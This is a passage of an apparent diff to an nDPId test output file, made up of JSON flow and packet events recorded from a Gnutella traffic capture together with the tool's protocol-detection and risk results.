+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":73065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73065,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FYFAAIAGQkoKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":73065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73065,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTJAAIAGk6kKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KcdAAIAGHhcKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UWxAAIAGasIKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kNAAIAGdAYKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJtAAIAGiMQKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0RnBAAIAGeMAKAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":73188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73188,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A99AAIAG2\/MKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} 
+00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73299,"flow_last_seen":73299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73299,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.236.203.37","src_port":50255,"dst_port":52165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":73299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73299,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00EFAAIAGLmIKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73299,"flow_last_seen":73299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73299,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":73299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73299,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0\/FxAAIAGA84KAAIPJOnJocRQC0aEhFh7AAAAAIAC+vDM7wAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73300,"flow_last_seen":73300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73300,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":73300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73300,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+GxAAIAG6uoKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} 
+00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":73301,"flow_last_seen":73301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":73301,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"122.100.216.210","src_port":50258,"dst_port":7097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":73301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":73301,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYZAAIAGFfgKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":73603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":73603,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAuUAAP8GvlEk6cmhCgACDwtGxFAAAAAAhIRYfFAUAAAIoAAA"} 
00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":73950,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":73950,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHPwAAIARA\/8KAAIPCgAC\/wCKAIoA0UBrEQKcLgoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQDA1AEATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pXBAAIAGEbUKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q81AAIAGVuQKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWxAAIAG8swKAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVxAAIAG3h8KAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YJAAIAG1DcKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":74108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0\/F1AAIAGA80KAAIPJOnJocRQC0aEhFh7AAAAAIAC+vDM7wAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":74217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74217,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Dd5AAIAGwQMKAAIPQh7dtcRHyWh8xjFMAAAAAIAC+vAMegAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IwxAAIAGfuEKAAIPUAf8wMRGsnV8RDFlAAAAAIAC+vD24gAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0NAAIAGin0KAAIPvD00t8RE+erRmdziAAAAAIAC+vAKcAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":74218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74218,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0I3RAAIAGoE0KAAIPST7htcRFtvuqIJp6AAAAAIAC+vB9QAAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74327,"flow_last_seen":74327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74327,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":74327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74327,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04otAAIAG+gUKAAIPt7NacMRTJnw0vRokAAAAAIAC+vAcPAAAAgQFtAEDAwgBAQQC"} -00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.200.161","src_port":50260,"dst_port":51394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdJAAIAG7kEKAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74328,"flow_last_seen":74328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74328,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":74328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74328,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZARAAIAGxHUKAAIPnDkqAsRVgsQy7nYLAAAAAIAC+vCxwQAAAgQFtAEDAwgBAQQC"} 
-00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":74329,"flow_last_seen":74329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":74329,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":74329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07XNAAIAG0w0KAAIPUD3d9sRWd3H5FzmMAAAAAIAC+vDLcAAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":74362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74362,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuYAAEAGPaRQPd32CgACD3dxxFYAg9YB+Rc5jWAS\/\/8Y4gAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":74362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74362,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo7XRAAIAG0xgKAAIPUD3d9sRWd3H5FzmNAIPWAlAQ+vA1rgAA"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74329,"flow_last_seen":74362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":74362,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":74510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":74510,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAuwAAEAGWa63s1pwCgACDyZ8xFMAhNABNL0aJWAS\/\/9vrAAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":74510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":74510,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo4oxAAIAG+hAKAAIPt7NacMRTJnw0vRolAITQAlAQ+vCMeAAA"} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74327,"flow_last_seen":74511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":74511,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZdtAAIAGUVoKAAIPtpuA5MQoDLg79XydAAAAAIAC+vCnHQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FTlAAIAG3SgKAAIPUMGrksQm0jCYt6bIAAAAAIAC+vCV5QAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0d8RAAIAGrlIKAAIPcfxWosQp1q4KULlcAAAAAIAC+vBA7QAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0EVBAAIAGi58KAAIPWmf3XsQq5qXgntCpAAAAAIAC+vC6MQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":75077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75077,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Co5AAIAGJkYKAAIPfPRA7cQnEmB1c07JAAAAAIAC+vAPawAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":75108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75108,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gZBAAIAGBp8KAAIPwXmlDMQr2FBBRhZnAAAAAIAC+vANYQAAAgQFtAEDAwgBAQQC"} 
